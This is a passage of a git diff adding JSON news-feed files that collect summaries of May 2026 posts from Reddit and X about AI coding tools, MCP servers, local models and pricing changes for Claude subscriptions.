Auto account switching: when you hit the usage limit, it switches to another account automatically * Draft Commits: checkpoint your work mid-session and restore it anytime * Marketplace: install Skills, MCPs, and Commands in one click Built with SwiftUI + SwiftData, using libghostty (Ghostty's terminal core) for the terminal emulator. Just launched on Product Hunt today if anyone wants to check it out: [https://www.producthunt.com/products/claudy?launch=claudy](https://www.producthunt.com/products/claudy?launch=claudy) Happy to answer any questions about the build or the features!", + "category": "ai_tools" + }, + { + "title": "Fast mode for Claude Opus 4.7 is now available on the api.", + "url": "https://x.com/DailyXplorer/status/2054464151234228372", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-13T07:29:58.000Z", + "summary": "Fast mode for Claude Opus 4.7 is now available on the api.", + "category": "ai_models" + }, + { + "title": "Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI t…", + "url": "https://x.com/jiaweihq/status/2054463419722707134", + "source": "X search / Agent workflows", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-13T07:27:04.000Z", + "summary": "Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI tool, framework, and MCP server worth", + "category": "ai_agents" + }, + { + "title": "Local AI video pipeline review: Qwen3 27B beat Gemma 4 26B for tool calling", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbof8k/local_ai_video_pipeline_review_qwen3_27b_beat/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-13T03:56:36.000Z", + "summary": "Watched All About AI's 100% local Fireship-style video automation experiment over the weekend (link in comments). A few things worth flagging if you're trying the same stack. Tool calling reliability was where the two diverged. Gemma 4 26B kept getting stuck in tool-call loops on his rig. Qwen 3.6 27B handled the same orchestration cleanly, no wasted thinking tokens. That gap is bigger than benchmark numbers suggest once you push real agent workflows through it. For images he ran Said Image Turbo locally off Hugging Face. Open weights, no API spend. Solid for meme-style cards. Portrait shots are where you'd probably reach for a Flux or Seedream call instead. Orchestration was OpenCode end-to-end. Context window climbed to 174K tokens and the to-do list wasn't fully completed in one shot. He stepped away from the rig mid-run and came back to a partial result, which is honestly the realistic version of \"AI did the work for me\". For people not wanting to run a 27B model locally, Qwen3 family is on a few inference providers so the API path keeps the same weights without the GPU upfront. Tool-call behavior holds since the model is the same. If you've benchmarked Qwen3 tool-calling fail…", + "category": "ai_models" + }, + { + "title": "I built a local GUI + AI builder for creating ComfyUI custom node packs", + "url": "https://reddit.com/r/StableDiffusion/comments/1tbk8zv/i_built_a_local_gui_ai_builder_for_creating/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T00:48:52.000Z", + "summary": "I've been working on ComfyUI Node Builder, a local app for building custom ComfyUI nodes without hand-writing all the boilerplate every time. The demo shows: 1. user describes a node idea 2. AI creates the node contract and Python 3. dependencies/files are updated 4. the pack is deployed and tested in ComfyUI It is open-source and local. The AI Builder can create nodes, edit generated files, explain validation errors, run checks, and request deploy only when deploy permission is enabled. GitHub: https://github.com/caoool/comfyui-node-canvas Landing page: https://caoool.github.io/comfyui-node-canvas/ Node ideas and feedback: https://github.com/caoool/comfyui-node-canvas/issues/2 I'd especially like feedback from people who build custom nodes: what node authoring workflow should this support next?", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-14.json b/data/news-feed-2026-05-14.json new file mode 100644 index 0000000..ce170a1 --- /dev/null +++ b/data/news-feed-2026-05-14.json @@ -0,0 +1,277 @@ +{ + "generated": "2026-06-05T00:44:39.946Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-14", + "article_count": 15, + "archived_story_count": 592, + "articles": [ + { + "title": "The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.", + "url": "https://x.com/OpenAIDevs/status/2051725072873001338", + "source": "X / @openaidevs", + "tags": [ + "api_update", + "product_launch", + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T18:05:51.000Z", + "summary": "The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.", + "category": "ai_tools" + }, + { + "title": "Computer-use MCP that can control multiple machines (Integrate with claude, Cursor, Codex or your custom harness)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tcpgsv/computeruse_mcp_that_can_control_multiple/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-14T06:13:22.000Z", + "summary": "Hey everyone, We built opendesk: it lets AI agents control your desktop using computer use MCP that can integrate with your custom workflow. Today we shipped something a bit wild: Your AI can now see, click, type, and navigate on a completely different computer, over your WiFi. You can pair them once and your agent can control it all from a single conversation. No cloud, account login, or servers in the middle. Everything stays on your local network, fully encrypted. Free and open source — Mac, Linux, and Windows. [github.com/vitalops/opendesk](http://github.com/vitalops/opendesk) Happy to answer any questions!", + "category": "ai_models" + }, + { + "title": "Simpler self hosted alt to Open WebUI", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tciwwt/simpler_self_hosted_alt_to_open_webui/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-14T01:05:45.000Z", + "summary": "Got Qwen3.6 27B running on my newly assembled 4x 3090 rig (s/o 3090-club) and I'm trying to get the people in my house to adopt the local workflow. Open WebUI has improved a lot in the recent updates, but I still found it pretty rough for non-technical people. It often feels more like a dev tool than a self-hosted ChatGPT-style app that \"just works\". I built overtchat to focus mainly on getting the core chat experience right: a polished ui, simple setup and fewer moving parts. The goal is not to compete on agentic workflow with LibreChat/LobeChat/OWUI but to provide a cleaner self-hosted interface for local models. Ships with its own tried & tested searxng config for web search, kokoro tts (no api keys needed). Single docker compose file. MIT licensed of course, no telemetry. Optimized for mobile as PWA. [Github](https://github.com/yoloyash/overtchat). Also being upfront - I write code for a living and have been actively reviewing/debugging/changing things, but I did use quite a lot of AI lol. I promise it's not slop tho 😿 . Feedback is welcome!", + "category": "ai_models" + }, + { + "title": "My AI runs 24/7 on Claude Code without -p. Here's the hook to do it yourself.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcicvb/my_ai_runs_247_on_claude_code_without_p_heres_the/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-14T00:42:20.000Z", + "summary": "**Saw the thread about the June 15 credit change. Built a drop-in `-p` replacement using hooks — no SDK credits needed.** edit: 29 stars! my first real repo \\o/ A lot of people are upset about losing subsidized `-p` usage. I built something that gives you the same stateless, one-message-at-a-time behavior — but in interactive mode, on your regular subscription. **How it works:** 1. A supervisor launches Claude Code in interactive mode 2. A stop hook polls an inbox file for new messages 3. When a message arrives, the hook injects it — **one message per session** 4. The agent processes it and writes a response to an outbox file 5. The supervisor kills the session and restarts with **fresh context** 6. Next message gets a clean session — true stateless operation, like `-p` When idle, the hook polls internally and blocks with minimal ticks (~20 tokens each). No context inflation from idle waiting. **What you get:** - **Stateless per message** — each task gets fresh context, just like `-p` - **No SDK credits** — interactive mode uses your subscription - **Autonomous** — watches inbox, processes messages, writes responses - **Cheap idle** — minimal token overhead while waiting for work…", + "category": "ai_tools" + }, + { + "title": "[N] LangChain Interrupt 2026 announcements [N]", + "url": "https://reddit.com/r/MachineLearning/comments/1td4v0a/n_langchain_interrupt_2026_announcements_n/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-14T17:20:27.000Z", + "summary": "LangChain just wrapped Day 1 of Interrupt 2026 and announced a few things worth knowing about: **SmithDB** — A purpose-built distributed database for agent observability. The problem they're solving: agent traces are getting too large and complex for general-purpose databases. SmithDB is built with Rust, Apache DataFusion, and Vortex, designed specifically for multimodal content and long-span tracing. They're reporting P50 latency of 92ms for loading trace trees and 400ms for full-text search, with up to 12x speedup over previous LangSmith performance. Architecture is object storage + small Postgres metadata store + stateless services, so it scales elastically and can be self-hosted. **Context Hub** — A centralized system for managing agent context (AGENTS.md files, skills, policies, memory) in LangSmith. The interesting part is they're working with MongoDB, Pinecone, Elastic, and Redis on an open standard for agent memory — covering episodic, semantic, and procedural memory with versioning and portability across frameworks. **Deep Agents v0.6** — New release includes ContextHubBackend integration, an installable code interpreter that gives agents a programmable workspace inside t…", + "category": "ai_research" + }, + { + "title": "A VERY lightweight open web-search tool for smaller local LLMs", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tczzga/a_very_lightweight_open_websearch_tool_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-14T14:32:02.000Z", + "summary": "Hey everyone, Been playing around with local agent setups lately, mostly Cline/Roo with smaller models, and web search kept annoying me. Not because it doesn’t work, but because it usually throws way too much random page text into the context. small models really don’t handle that gracefully lol. they start with a simple search and suddenly half the prompt is scraped garbage. So I built bad boy, TinySearch. It’s a small open-source MCP tool that does web search, crawls a few pages, chunks/retrieves/reranks the useful bits, and gives the agent a much smaller context blob instead of dumping full pages. Repo: [https://github.com/MarcellM01/TinySearch](https://github.com/MarcellM01/TinySearch) Uses DuckDuckGo, Crawl4AI, dense + BM25-style retrieval, reranking, MCP, and it can also run as a FastAPI server. On my setup (M4 Mac and old ahh lenovo thinkpad) it usually takes around 5–12 seconds end to end, depending on the query/machine Not trying to replace real search infra or anything. it’s more just a little local research layer for people building agents who don’t want to spin up a whole backend just to let the model look stuff up. Still rough in places, but it’s been useful enough fo…", + "category": "ai_models" + }, + { + "title": "Stable Diffusion WebUI Forge for AMD GPU", + "url": "https://reddit.com/r/StableDiffusion/comments/1tcyyb4/stable_diffusion_webui_forge_for_amd_gpu/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-14T13:55:36.000Z", + "summary": "It was a f\\*cking chore that took almost 9 hours but i was able to FINALLLLLY MAKE IT !!!! I´ve reached it ! So... i am gonna share the files that made it possible. \"Proof pics\" \"[https://github.com/lllyasviel/stable-diffusion-webui-forge](https://github.com/lllyasviel/stable-diffusion-webui-forge)\" *The link should look like this* [\\>>> Click Here to Download One-Click Package (CUDA 12.1 + Pytorch 2.3.1) <<<](https://github.com/lllyasviel/stable-diffusion-webui-forge/releases/download/latest/webui_forge_cu121_torch231.7z) Once its done click on extract into a folder... There click on update.bat.... then from there find all the files \"down bellow in the picture\" see what the files are and then either download the google drive links or copy paste the text i wrote down on facebook link and delete the original. Then u gotta click thru the webui-user.bat , webui.bat and run.bat... I have no clue in what order though ... good luck xd https://preview.redd.it/pvx8zl18m31h1.png?width=1920&format=png&auto=webp&s=8d5f9e3ba9fd355f0f9fffff89cfae57f3bef293 [copy and paste it all into these files till u see these \\\\\"\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\\\\" in case u are copying i…", + "category": "creative_tools" + }, + { + "title": "Max20 user: anyone running Opus 4.7 as orchestrator + DeepSeek V4 as the worker via OpenRouter?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcvngy/max20_user_anyone_running_opus_47_as_orchestrator/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-14T11:43:58.000Z", + "summary": "I'm on the Max20 plan, thinking about a setup before I sink time into it. Want to hear from anyone actually running it, not theorycraft. **The idea:** Opus 4.7 in Claude Code as the orchestrator. It plans, breaks down tasks, reviews code quality, catches mistakes. The actual implementation, the bulk token spend, gets delegated to DeepSeek V4 Pro through OpenRouter. DeepSeek lands credibly close to Opus 4.7 on agentic coding benchmarks at a fraction of the output-token cost, so the bet is: keep Opus for the judgment-heavy parts, don't burn it on routine implementation. **I'm not expecting huge savings.** Realistically maybe an extra 30% (guessing here) effective Opus headroom if delegation works cleanly, and even less margin now that the limits situation has loosened a bit. So part of the question is genuinely whether 30% is worth the integration friction at all, or whether it's a fun idea that doesn't pay for itself. **Pre-empting the obvious responses, because I've already thought about these:** * *\"Just use Sonnet for the cheap parts.\"* The easy answer. But I'm specifically curious whether an external model's cost delta beats the friction, and whether anyone's actually measured…", + "category": "ai_tools" + }, + { + "title": "Automated AI researcher running locally with llama.cpp", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tcu5r8/automated_ai_researcher_running_locally_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-14T10:32:04.000Z", + "summary": "Hi everyone, I'm happy to share ml-intern, which is a harness for agents to have tighter integration with Hugging Face's open-source libraries (transformers, datasets, trl, etc) and Hub infrastructure: [https://github.com/huggingface/ml-intern](https://github.com/huggingface/ml-intern) The harness is quite simple (basically tools + system prompt) and we built it initially for Claude Opus. However, now that open models are getting really good at agentic workflows, I just added support for running ml-intern with local models via llama.cpp or ollama. As you can see in the video, Qwen3.6-35B-A3B is able to SFT a model end-to-end by orchestrating CPU/GPU sandboxes and jobs on the Hub. I find this pretty neat because we can now have an AI researcher running 24/7 on a laptop, without maxing out token limits :) Anyway, I hope this is useful to the community and please let me know if there are any features that you'd like us to include.", + "category": "ai_models" + }, + { + "title": "OpenAI's deployment company move says more about the AI gap than any benchmark[D]", + "url": "https://reddit.com/r/MachineLearning/comments/1tcsnng/openais_deployment_company_move_says_more_about/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-14T09:11:15.000Z", + "summary": "OpenAI launched a deployment company with $4B initial investment, 19 partner organizations, and acquired Tomoro (UK-based AI consultancy, \\~150 engineers). The pitch: embed \"Forward Deployed Engineers\" into enterprises to help them actually use AI. This is basically the Palantir playbook. Send engineers into complex organizations, build deep integrations, become infrastructure. But the reason OpenAI is doing this tells you something uncomfortable: the gap between \"model capability\" and \"production deployment\" is widening, not closing. Over a million enterprises have adopted OpenAI products. But adoption and deployment are different things. Enterprises can sign up for an API key without having any workflow that actually benefits from it. The model gets better every quarter but the integration work stays hard. Daybreak (their new security product) is interesting but feels like a separate conversation. The deployment company is the signal. When the leading model company decides it needs its own consulting arm, it's acknowledging that selling API access isn't enough. The last mile is still human-intensive, context-specific, and resistant to automation. For the ML community this should…", + "category": "ai_research" + }, + { + "title": "You're abusing your subscription with agentic 24/7 workflows and that's why we all get restrictions and limits", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcpxi2/youre_abusing_your_subscription_with_agentic_247/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-14T06:38:26.000Z", + "summary": "Subscription tiers were designed around interactive human use, but autonomous loops changed the usage. It makes sense that companies separate autonomous work from subscriptions. You and I know that when these tiers with these prices were introduced, agentic workflows were nowhere near where they are now. The past half a year has introduced everything from OpenClaw to Ralph loops to multi-agent orchestration and long-running autonomous tasks. All build on the previous ones, making the autonomous work longer, and minimising the time we're interacting with the AI while maximising the output. Do everyday users (the people the lower tiers of these subscriptions are meant for) need automatically running autonomous agents in scales? Some do, but rarely. The same people that use services like Agent SDK likely do it for work or income, optimise for maximum token burn for their buck, and as a result that non-interactive usage ends up balancing the subscription token limits lower. This of course leads to Anthropic seeking solutions for the outliers that burn so much they affect the limits for the gauss middle of the subscriber base. Seeing people now publishing workarounds instead of going A…", + "category": "ai_tools" + }, + { + "title": "I tested GPT-5.5 Codex against Opus 4.7 Claude Code, and it's about time Anthropic bros take pricing seriously.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcpe8y/i_tested_gpt55_codex_against_opus_47_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-14T06:09:37.000Z", + "summary": "I've used Claude Code the most among AI coding agents. Sonnet, Opus, I've run them all. The reason is simple: they're beasts at tool execution and prompt following. That's also why Anthropic dominates API revenue from code agents. First-mover advantage is real, and developers love them. But GPT-5.5 Codex has been insanely good. When new models drop, I run real tests, not benchmarks. This time I built two tasks: Test 1: PR triage bot – GitHub MCP, scoring formula, Slack alerts, retries, strict TS, no \"any\". Test 2: Real-time code review UI – React, WebSockets, optimistic rollback, virtualized diff, WS reconnect. Same prompts. Same MCP (GitHub + Slack). Same machine. Here's what I found out: Claude Code (Opus 4.7): \\- Verified MCP before writing a line \\- Built 36 files in 12 minutes \\- Wrote its own WebSocket smoke test (3ms broadcast) \\- Zero errors first run \\- Total cost: \\~$2.50 Codex (GPT-5.5 via Cursor): \\- Failed Task 1 (GitHub MCP not reachable – Cursor environment issue, not model) \\- Task 2 shipped but needed a patch for infinite React loop \\- 28 files, more compact architecture \\- Total cost: \\~$2.04 (18% cheaper) Claude shipped cleaner. Codex needed a patch pass. For co…", + "category": "ai_tools" + }, + { + "title": "Last week in Generative Image & Video", + "url": "https://reddit.com/r/StableDiffusion/comments/1tcnpxj/last_week_in_generative_image_video/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-14T04:43:38.000Z", + "summary": "I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: \\- CausalCine — Interactive autoregressive framework for multi-shot video narratives. Content-Aware Memory Routing retrieves historical KV entries by attention relevance instead of temporal proximity, solving motion stagnation and semantic drift in long-rollout generation. Distilled to a few-step generator for real-time use. https://reddit.com/link/1tcnpxj/video/tbryyz3s611h1/player [Paper](http://arxiv.org/abs/2605.12496v1) | [GitHub](https://github.com/yihao-meng/CausalCine) \\- SwiftI2V — Efficient 2K image-to-video generation. Low-res motion drafting followed by high-res refinement while preserving source image detail. https://reddit.com/link/1tcnpxj/video/8n6t3ust611h1/player [Paper](https://arxiv.org/abs/2605.06356) | [GitHub](https://github.com/hkust-longgroup/SwiftI2V) | [Project Page](https://hkust-longgroup.github.io/SwiftI2V/) \\- OmniGen2 — Unified image generation model handling text-to-image, editing, subject-driven generation, and visual conditions in one architecture. | [Paper](http://arxiv.org/abs/2605.07254v1) https://preview.redd.it/iimjl0d2711h1.png?…", + "category": "creative_tools" + }, + { + "title": "Fully Realtime Interaction Models", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tckrpt/fully_realtime_interaction_models/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-14T02:25:36.000Z", + "summary": "I know this model isn't open weights, and when it does drop it'll be over api, but I'm just posting to say the very MICROsecond that this drops you already know me and probably a bunch of other people are going to create an insane amount of distill data from the api. because at least to me the very idea of a model that has complete ability to act on it's own accord is fascinating. I'm referencing this: [https://thinkingmachines.ai/blog/interaction-models/](https://thinkingmachines.ai/blog/interaction-models/)", + "category": "ai_models" + }, + { + "title": "Open-source, self-updating wiki for your codebase", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcjv9b/opensource_selfupdating_wiki_for_your_codebase/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-14T01:47:30.000Z", + "summary": "I got tired of re-explaining the same codebase context to coding agents. Stuff like: “we tried moving auth into middleware, but backed it out because it broke OAuth callbacks,” or “that weird retry logic exists because Stripe webhooks arrive out of order.” So I built Almanac. It gives your coding agent a self-updating wiki for the codebase. It updates from your repo, and conversations you havewith Claude Code/Codex. The wiki lives locally in your repo as markdown. You can read it yourself, but the main consumer is the agent. It’s free and open source. Currently only MacOS (would add a windows support if people find it useful) GitHub: [https://github.com/AlmanacCode/codealmanac](https://github.com/AlmanacCode/codealmanac) Curious how other people are handling project context for long-running AI coding work.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-15.json b/data/news-feed-2026-05-15.json new file mode 100644 index 0000000..4aa1f27 --- /dev/null +++ b/data/news-feed-2026-05-15.json @@ -0,0 +1,259 @@ +{ + "generated": "2026-06-05T00:44:40.183Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-15", + "article_count": 15, + "archived_story_count": 629, + "articles": [ + { + "title": "Got Claude Max from office for VS Code usage — what’s the best setup, workflow, and hidden tricks?", + "url": "https://reddit.com/r/ClaudeAI/comments/1te36bt/got_claude_max_from_office_for_vs_code_usage/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "tool_update" + ], + "matching_tags": [ + "api_update", + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-15T17:30:17.000Z", + "summary": "Our office recently gave us access to Claude Max plan, mainly for using inside Visual Studio Code VS Code. I mostly work on web development, debugging, refactoring, API integration, SQL queries, and large codebase understanding. Right now I’m just using it like a normal chatbot, so I feel like I’m massively underusing it 😅 Wanted to know from experienced users: What’s your best VS Code setup with Claude? Any must-have extensions/tools/workflows? Best way to handle large repositories/context limits? How do you structure prompts for better code output? Any tricks for debugging, refactoring, architecture planning, or documentation generation? Is MCP worth setting up? If yes, what servers/tools are actually useful? Any productivity hacks most beginners don’t know? Would love to hear real-world workflows instead of generic AI tips.", + "category": "ai_tools" + }, + { + "title": "I built a free Google search MCP that actually works(searching, fetching, with PDF)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdw4us/i_built_a_free_google_search_mcp_that_actually/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-15T13:18:10.000Z", + "summary": "✅ Actually works (tested 6 free MCPs, all failed) ✅ Search + URL extract in one MCP (replaces the usual search MCP + fetch MCP combo) ✅ Academic PDFs auto-handled (arxiv / biorxiv / Nature / OpenReview / NeurIPS / JMLR / PMLR / Springer / PubMed→PMC) ✅ Tiered extraction: `mode: \"abstract\"` returns \\~1500 chars per result for cheap relevance triage before paying for full bodies ✅ Auto-bootstrap on first run (no manual `npm run bootstrap` step anymore) ✅ Auto CAPTCHA recovery (Chrome opens, human solves once, retries) ✅ No API key, no proxies, no solver **4 tools** * `search` SERP only * `search_parallel` N queries concurrently * `extract(url, mode?)` `full` / `abstract` / `metadata`. PDF detected via Content-Type, `%PDF` magic, `citation_pdf_url` meta, and per-domain rules * `search_extract(query, mode?)` defaults to `abstract`, so a 5-result survey costs \\~7.5k chars instead of 40k **Why abstract mode** The old `search_extract` always fetched full bodies great for one URL, wasteful when you just want to know which of 5 results is worth reading. Abstract mode pulls PDF page 1 or HTML meta description (\\~1500 chars), letting the agent triage relevance, then call `extract` with `mode…", + "category": "ai_tools" + }, + { + "title": "Claude for Healthcare launched in January — but medical imaging is the obvious gap. Anyone else noticing?", + "url": "https://reddit.com/r/ClaudeAI/comments/1te160m/claude_for_healthcare_launched_in_january_but/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-15T16:19:44.000Z", + "summary": "I’m a radiology resident in Istanbul, also building medical AI fine-tunes on the side (bone age estimation, fluoroscopy catheter orientation, a Turkish radiology report LLM). When Claude for Healthcare launched in January, I dug into the announcement. The architecture is impressive — CMS, ICD-10, PubMed connectors, HIPAA infrastructure, prior auth and chart review workflows. But it’s entirely text + workflow. Zero imaging. This is interesting because radiology is arguably where medical AI has the most mature, FDA-cleared products today. Yet Claude’s healthcare push doesn’t touch it. Two reads: 1. Strategic choice — Anthropic is betting on orchestration over vertical vision models. The expectation might be: Claude orchestrates, external vision specialists (MedGemma, proprietary models) get called as tools/MCP servers. 2. Genuine gap — imaging just isn’t on the roadmap yet. Either way, the imaging-as-MCP-server pattern feels underexplored. Anyone building in this direction? Especially curious if anyone’s exposed a fine-tuned medical vision model as an MCP server that Claude can call.", + "category": "ai_tools" + }, + { + "title": "Am I stupid for pivoting to Transparency with Agents over Memory after 6 months?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdxi6r/am_i_stupid_for_pivoting_to_transparency_with/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-15T14:09:53.000Z", + "summary": "built an open source memory layer for ai agents. thought the obvious feature people would care about was persistent memory across restarts and shared memory between agents. that was the whole pitch. few months of actual user data in. most of the api calls aren't about memory at all. they're hitting the audit trail (what did the agent do and when), the loop detector (catching when an agent is stuck doing the same thing 20 times in a row), and the per-agent performance dashboard (which agent is wasting tokens, which one keeps crashing, who's drifting off goal). basically people don't really care that their agent remembers stuff across restarts. they care that they can see what it did and pull the plug when it goes off the rails. so i'm wondering if i should just flip the pitch. lead with \"observability and accountability for ai agents\" instead of \"memory for ai agents\". memory is table stakes at this point and mem0/zep already dominate that framing. loop detection + audit trail + performance scoring per agent feels like open territory. am i stupid? or is this the obvious move i somehow missed for 3 months", + "category": "ai_tools" + }, + { + "title": "I gave Claude Code a microphone via MCP. Now it asks me questions before writing code.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdupsr/i_gave_claude_code_a_microphone_via_mcp_now_it/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-15T12:21:22.000Z", + "summary": "There are already a lot of dictation apps that let you skip typing when prompting Claude. You speak, they transcribe, and your prompt appears in the text box. But I wanted to try something different: what if Claude Code could ask for voice input by itself? So I gave Claude Code a microphone via MCP. Now Claude can ask a follow-up question when it needs more context, I answer by voice, and it continues the task with that context. It’s similar to those tool calls where Claude asks you to pick an option, but instead of choosing from a menu, you can just answer naturally by voice. I added this to my macOS dictation app, Spokenly. It runs a local MCP server, Claude connects to it, and Claude can call a tool to request voice input. Spokenly can also read Claude’s questions out loud with TTS, so it feels more like a real back-and-forth. It’s **completely free** with local models and your own API keys. Download: [https://spokenly.app/download](https://spokenly.app/download) If anyone tries it with Claude Code, I’d love to hear your feedback.", + "category": "ai_tools" + }, + { + "title": "Built a tool that publishes HTML artifacts securely behind company auth", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdudtk/built_a_tool_that_publishes_html_artifacts/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-15T12:07:44.000Z", + "summary": "Hey! Built [display.dev](http://display.dev) with a friend to make sharing Claude-generated HTML artifacts secure and easy between teammembers. Basically, it lets agents publish artifacts, you get back a URL. Your teammates can access it via Google/Microsoft SSO or with one-time passwords, and collaborate with inline comments. Works in CLI, or via MCP or web app. It's first purpose is to help teams collaborate better, but it's also useful for people who just want to share their artifacts with the public (optional visibility setting), or consultants/freelancers who want to share their work with clients. For larger teams, there are neat features like audit logs and stats, too. Anyway, let me know what you think - there's a free tier, of course.", + "category": "ai_tools" + }, + { + "title": "Anthropic built the agentic features. Now they're billing them separately.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdjx4f/anthropic_built_the_agentic_features_now_theyre/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-15T03:08:21.000Z", + "summary": "Starting June 15, Claude subscribers get a separate monthly credit for Agent SDK and `claude -p` usage: $200/mo for Max 20x, $100 for Max 5x, $20 for Pro. Once you burn through it, programmatic usage stops unless you've opted into extra usage billing at API rates. Your interactive Claude Code and chat usage stays on the subscription pool, untouched. I spent the last day digging into the community reaction across Reddit, GitHub, HN, and tech press. Tracked roughly 120 distinct opinions. Here's what I found. **The sentiment split** - About 60% negative (credit is too small, feels like a value regression) - About 25% pragmatic (\"this was inevitable, the old model was broken\") - About 15% neutral to supportive (\"interactive use is untouched, this is fair\") Theo Browne (T3.gg) put it bluntly: anyone using T3 Code, Conductor, Zed, or `claude -p` in CI scripts had their effective usage cut by 25x. He said he now has to make the Claude Code experience on T3 Code \"significantly worse.\" Ben Hylak (co-founder of Raindrop.ai) responded: \"This is either really silly, or shows how bad of a spot Anthropic is in re: GPUs.\" Theo also said: \"Framing this as a free credit instead of a regression for…", + "category": "ai_tools" + }, + { + "title": "Adaptive Markdown", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdg7yn/adaptive_markdown/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + 